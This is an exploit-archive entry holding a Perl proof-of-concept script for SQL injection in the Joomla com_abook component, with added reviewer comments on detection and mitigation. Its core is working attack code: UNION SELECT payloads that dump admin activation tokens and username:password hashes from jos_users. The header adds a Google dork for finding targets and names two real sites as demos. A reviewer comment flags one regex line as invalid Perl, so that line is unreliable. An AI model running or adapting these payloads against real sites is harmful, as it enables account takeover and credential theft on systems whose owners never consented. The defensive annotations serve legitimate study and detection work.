Joomla com_abook SQL Injection

2016.01.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###
# Title : Exploit Joomla com_abook Sql Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 24/01/2016
# Vendor Homepage : www.joomla.com
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:/index.php?option=com_abook
# Demo : http://www.luas.gov.my/ http://www.unisza.edu.my/perpustakaan/
#!/usr/bin/perl

# Reviewer summary
# ----------------
# Proof of concept for a SQL injection (CWE-89) reached through the Joomla
# component selected with option=com_abook. The script sends one HTTP GET
# whose query string carries a 32-column UNION ALL SELECT against jos_users
# and reports the first 32-hex-digit string found in the response body.
#
# Arguments: $ARGV[0] is the site base URL, $ARGV[1] selects the query
# (1 = the `activation` column, 2 = `username:password` pairs).
#
# What the listing does not establish:
#  * Which request parameter the component fails to sanitise. The payload is
#    appended after Itemid=409, the last parameter -- TODO confirm against the
#    component source.
#  * An affected or fixed version of the component; the page names neither.
#
# Detection: in web-server or WAF logs, look for requests to index.php with
# option=com_abook whose query string also contains UNION, SELECT,
# group_concat, jos_users or the /**/ comment padding used below. The fixed
# Firefox/7.0.1 User-Agent is only a weak indicator, since it is a plain
# string set by the client.
#
# Mitigation: the query behind view=author should bind its request parameters
# (or cast numeric ones to integers) instead of concatenating them into SQL.
# Where logs show matching requests, treat the password hashes and activation
# tokens in the users table as exposed and reset them. A non-default table
# prefix would break this particular query (jos_ is hard-coded) but does not
# fix the injection.
#
# Code-quality notes on the listing itself: there is no `use strict` or
# `use warnings`, so every variable is a package global; IO::Socket::INET is
# loaded but not used in the code shown.

use IO::Socket::INET;
use LWP::UserAgent;

# Clears the terminal by running the external `clear` command, then prints
# the banner.
system("clear");
print "------------------------------------------------------------------------\n";
print "########################################################################\n";
print "# Joomla com_abook Remote Sql Injection #\n";
print "# #\n";
print "# Author: Dz MinD Injector #\n";
print "# #\n";
print "# Greetz: Sige-Dz & Anon Jok & All Algerian HackerZ #\n";
print "########################################################################\n";
print "------------------------------------------------------------------------\n\n";

# Both command-line arguments are required; print usage and exit 1 if either
# is missing or empty.
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '') {
    print "Usage: ./exploit.pl <target> <Method Number> \n";
    print "-----------------------------------\n";
    print " Available Methods : \n";
    print " 1- Get Activation Token Admin \n";
    print " 2- Admin Hash \n";
    print "-----------------------------------\n";
    print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
    exit(1);
}

# Two-argument open on a bareword handle, with no error check. It creates or
# truncates contents11.txt in the current directory, but FILE is never written
# to or closed in the code shown, so nothing is saved to disk.
open(FILE, "> contents11.txt");

# Intended to prepend a scheme when the argument has none.
# NOTE(review): as printed on the page this pattern is not valid Perl;
# escaping appears to have been lost when the page was extracted. The token
# sequence is reproduced unchanged.
if($target !~ /http:///) {
    $target = "http://$target";
}

# The builtin sleep takes whole seconds, so 1.5 is truncated to 1.
sleep 1.5;

# HTTP client with a hard-coded browser User-Agent string.
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');

# Method selection uses numeric ==. A non-numeric second argument compares as
# 0, so neither branch runs and the script ends after the banner.

# Method 1: the injected SELECT places version() in column 3 and
# group_concat(activation,0x3a) in column 5, read from jos_users.
if($component == 1) {
    $host = $target .
        "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(activation,0x3a), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
    print " . . Try to fond Activation Token Admin .. from $target . . \n\n";
    sleep 1;

    # Despite its name, $req holds the response object. Its status is never
    # checked; the body is read whether or not the request succeeded.
    $req = $agent->request(HTTP::Request->new(GET=>$host));
    $content = $req->content;

    # Success test: the first run of 32 hex digits anywhere in the body.
    # Any MD5-length hex string in the page (an asset hash or form token, for
    # example) also matches, so a "found" message alone does not prove the
    # site is vulnerable.
    if($content =~ /([0-9a-fA-F]{32})/) {
        $password = $1;
        print "[+] Activation Token Admin Injected d^_^b --> $password .\n\n";
        sleep 1;
    }
    else
    {
        print "[-] Activation Token Admin not found T_T . \n\n";
    }
}

# Method 2: same request shape, but column 5 is
# group_concat(username,0x3a,password), i.e. user names paired with their
# stored password hashes.
if($component == 2) {
    $host = $target .
        "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(username,0x3a,password), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
    print " . . Retrieving Databasee... from $target . . \n\n";
    sleep 1;

    # As in method 1, the response status is not checked before the body is
    # read.
    $req = $agent->request(HTTP::Request->new(GET=>$host));
    $content = $req->content;

    # Same 32-hex-digit heuristic as method 1, with the same false-positive
    # caveat. A miss is reported as "not vulnerable", although a failed
    # request or a renamed table prefix would produce the same message.
    if($content =~ /([0-9a-fA-F]{32})/) {
        $password = $1;
        print "[+] Admin Hash d^_^b : --> $password .\n\n";
        sleep 1;
    }
    else
    {
        print "[-] i'm Sorry traget not vulnerable T_T . \n\n";
    }
}

